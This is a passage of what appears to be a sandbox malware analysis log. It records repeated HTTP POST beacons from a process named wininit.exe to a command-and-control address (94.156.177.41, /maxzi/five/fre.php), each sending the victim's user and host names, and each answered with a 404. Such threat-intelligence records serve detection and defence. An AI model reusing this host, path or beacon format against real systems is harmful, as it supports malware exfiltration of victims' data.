                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:40.804852962 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:41.542538881 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:41 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.224917894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:41.684906006 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:41.692874908 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:42.435044050 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:42 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.224917994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:42.587925911 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:42.598310947 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:43.356853008 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:43 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.224918094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:43.503565073 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:43.508450985 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:44.250286102 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:44 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.224918194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:44.400038004 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:44.410226107 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:45.152724028 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:45 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.224918294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:46.061436892 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:46.066976070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:46.807615995 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:46 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.224918394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:47.086957932 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:47.094305992 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:47.853576899 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:47 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.224918494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:47.996814013 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:48.001930952 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:48.762204885 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:48 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.224918594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:48.908246040 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:48.916450024 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:49.780787945 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:49 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.224918694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:49.927817106 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:49.934221029 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:50.661518097 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:50 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.224918794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:50.817913055 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:50.825355053 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:51.563699961 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:51 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.224918894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:51.969063997 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:51.974265099 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:52.677114010 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:52 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.224918994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:52.828480005 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:52.833476067 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:53.596098900 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:53 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.224919094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:53.737376928 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:53.743942022 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:54.506406069 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:54 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.224919194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:54.658297062 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:54.665755033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:55.397053003 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:55 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.224919294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:55.536037922 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:55.543704987 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:56.305603981 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:56 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.224919394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:56.459002018 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:56.465409040 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:57.196352005 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:57 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.224919494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:57.346908092 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:57.354850054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:58.102369070 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:57 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.224919594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:58.246757030 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:58.251851082 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:58.990710020 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:58 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.224919694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:59.147855043 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:11:59.153132915 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:11:59.906487942 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:11:59 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.224919794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:00.055174112 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
